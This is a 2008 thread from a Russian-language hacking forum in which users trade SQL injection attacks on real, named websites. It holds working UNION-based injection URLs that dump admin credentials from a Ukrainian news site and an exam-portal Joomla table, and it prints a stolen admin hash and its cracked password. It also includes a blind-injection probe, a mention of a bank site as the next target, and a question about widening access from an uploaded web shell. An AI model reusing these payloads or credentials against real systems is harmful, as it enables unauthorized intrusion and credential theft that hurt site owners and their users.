 |
|
12.06.2008, 22:23
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 sabe
Сообщение от sabe
уверен что это скуль..?)
 |
|
|
12.06.2008, 22:27
|
|
Участник форума
Регистрация: 19.01.2008
Сообщений: 111
С нами:
9636913
Репутация:
73
|
|
Сообщение от sabe
это Оракл?
как реализовать?)
никак 
|
|
|
|
12.06.2008, 22:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
спс..) а то я думаю... банк все же))))))
|
|
|
|
13.06.2008, 02:37
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от jokester
Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz
Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера.
ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)
|
|
|
|
13.06.2008, 02:46
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
|
|
Дык а трабла то в чем?
Код:
http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*
|
|
|
|
13.06.2008, 03:00
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами:
9852037
Репутация:
2
|
|
Доброго времени суток.
Третий час уже пытаюсь узнать в чем дело:
SQL иньекция на лицо.
Составляю запрос
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
Но в ответ пишет:
Код:
Error number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3
Script stopped.
Может кто знает в чем дело? |
|
|
|
13.06.2008, 03:51
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.
По теме - фильтруеца "/*"
|
|
|
|
13.06.2008, 04:42
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами:
9852037
Репутация:
2
|
|
Сообщение от n0ne
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.
По теме - фильтруеца "/*"
Да знаю йа что такое sql injection, да и как работают тоже  ... Уже были сайты, в которых получалось...
Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте 
"+" тож пробовал(
Последний раз редактировалось sakh_rider; 13.06.2008 в 05:08..
|
|
|
|
13.06.2008, 06:19
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 8
С нами:
9852037
Репутация:
2
|
|
Блин, столько времени и все зря...
SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
 |
|
|
|
13.06.2008, 12:55
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
С нами:
10396497
Репутация:
56
|
|
ку !
есть трабла имеется сайт на который удалось залить шелл в определенную диру но в ней отключены команды систем() ексек() итд но разришена include !
Вопрос возможно ли сделать так чтобы при инклуде шелла обойти эту диру и заинклудить его на директорию выше?
example:
/сс/сммммс/123/_залит_файл_с функц_инклуд/ возможно ли заинклудить в папку /123/??
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
